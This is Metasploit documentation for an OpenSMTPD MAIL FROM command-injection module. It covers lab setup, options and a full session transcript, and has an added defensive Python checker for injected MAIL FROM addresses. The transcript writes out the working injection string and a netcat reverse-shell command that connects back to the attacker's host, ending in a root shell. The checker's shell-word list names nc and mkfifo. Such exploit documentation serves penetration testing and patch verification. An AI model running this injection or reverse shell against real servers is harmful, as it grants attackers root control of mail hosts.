metasploit-gs/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
2020-02-06 15:57:54 -06:00


Vulnerable Application

Description

This module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user.
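As an added defender-side example (not part of this module or its documentation), the check below flags SMTP MAIL FROM commands whose reverse path falls outside the RFC 5321 dot-atom address grammar, which is exactly what the injection described above relies on; the sample lines are constructed and the shell-word list is an assumption.

```python
import re

# Dot-atom local part and domain per RFC 5321/5322; OpenSMTPD also accepts a
# bare local user (no domain) for local delivery, so the domain is optional.
# Quoted-string local parts are deliberately NOT accepted here, so they are
# surfaced for review rather than silently passed.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
DOT_ATOM = rf"{ATEXT}+(?:\.{ATEXT}+)*"
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOMAIN = rf"{LABEL}(?:\.{LABEL})*"
REVERSE_PATH = re.compile(rf"^(?:{DOT_ATOM}(?:@{DOMAIN})?)?$")  # empty <> is valid
MAIL_FROM = re.compile(r"^MAIL FROM:\s*<(?P<path>[^>]*)>", re.IGNORECASE)

# Assumed list of shell words that have no business inside a sender address.
SHELL_WORDS = {"sh", "bash", "exit", "for", "do", "done", "read", "nc", "mkfifo"}


def classify_mail_from(cmd: str) -> dict:
    """Return a verdict ('ok', 'suspicious' or 'unparsed') for one raw MAIL FROM line."""
    m = MAIL_FROM.match(cmd.strip())
    if not m:
        return {"verdict": "unparsed", "path": None, "reasons": ["no <reverse-path> found"]}
    path = m.group("path")
    reasons = []
    if not REVERSE_PATH.match(path):
        bad = sorted({c for c in path if not re.match(ATEXT, c) and c not in "@."})
        reasons.append("characters outside dot-atom grammar: " + repr("".join(bad)))
    words = set(re.split(r"[^A-Za-z0-9]+", path)) & SHELL_WORDS
    if words:
        reasons.append("shell words in local part: " + ", ".join(sorted(words)))
    return {"verdict": "suspicious" if reasons else "ok", "path": path, "reasons": reasons}


def scan(lines):
    """Return (line, reasons) for every MAIL FROM command that is not clean."""
    return [(l, r["reasons"]) for l in lines if (r := classify_mail_from(l))["verdict"] != "ok"]


# Constructed sample SMTP commands: two legitimate senders and one injection attempt.
SAMPLE_LINES = [
    "MAIL FROM:<root@foo.my.domain> SIZE=1234",
    "MAIL FROM:<>",
    "MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>",
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LINES):
        print(line, "->", "; ".join(reasons))
```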

Setup

  1. Download OpenBSD 6.6
  2. Install the system, noting the domain name (defaults to foo.my.domain)
  3. Configure the following settings in /etc/mail/smtpd.conf:
  • listen on all
  • match from any for domain "foo.my.domain" action "local_mail"
  4. Execute /etc/rc.d/smtpd restart to restart OpenSMTPD
  5. Execute ifconfig and look for an appropriate target IP

Targets

Id  Name
--  ----
0   OpenSMTPD >= commit a8e222352f

Verification Steps

Follow Setup and Scenarios.

Options

RCPT_TO

Set this to a valid mail recipient. The default is root.

Scenarios

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing

Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133
rhosts => 192.168.56.133
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.133:25 - Connecting to OpenSMTPD
[*] 192.168.56.133:25 - Saying hello and sending exploit
[*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/
[+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD
[*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze
[*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/
[+] 192.168.56.133:25 - Received:
250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you
[*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>
[*] 192.168.56.133:25 - Expecting: /250.*Ok/
[+] 192.168.56.133:25 - Received:
250 2.0.0 Ok
[*] 192.168.56.133:25 - Sending: RCPT TO:<root>
[*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/
[+] 192.168.56.133:25 - Received:
250 2.1.5 Destination address valid: Recipient ok
[*] 192.168.56.133:25 - Sending: DATA
[*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/
[+] 192.168.56.133:25 - Received:
354 Enter mail, end with "." on a line by itself
[*] 192.168.56.133:25 - Sending:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0</tmp/eizzy | /bin/sh >/tmp/eizzy 2>&1; rm /tmp/eizzy
[*] 192.168.56.133:25 - Sending: .
[*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/
[+] 192.168.56.133:25 - Received:
250 2.0.0 ccd8e419 Message accepted for delivery
[*] 192.168.56.133:25 - Sending: QUIT
[*] 192.168.56.133:25 - Expecting: /221.*Bye/
[+] 192.168.56.133:25 - Received:
221 2.0.0 Bye
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64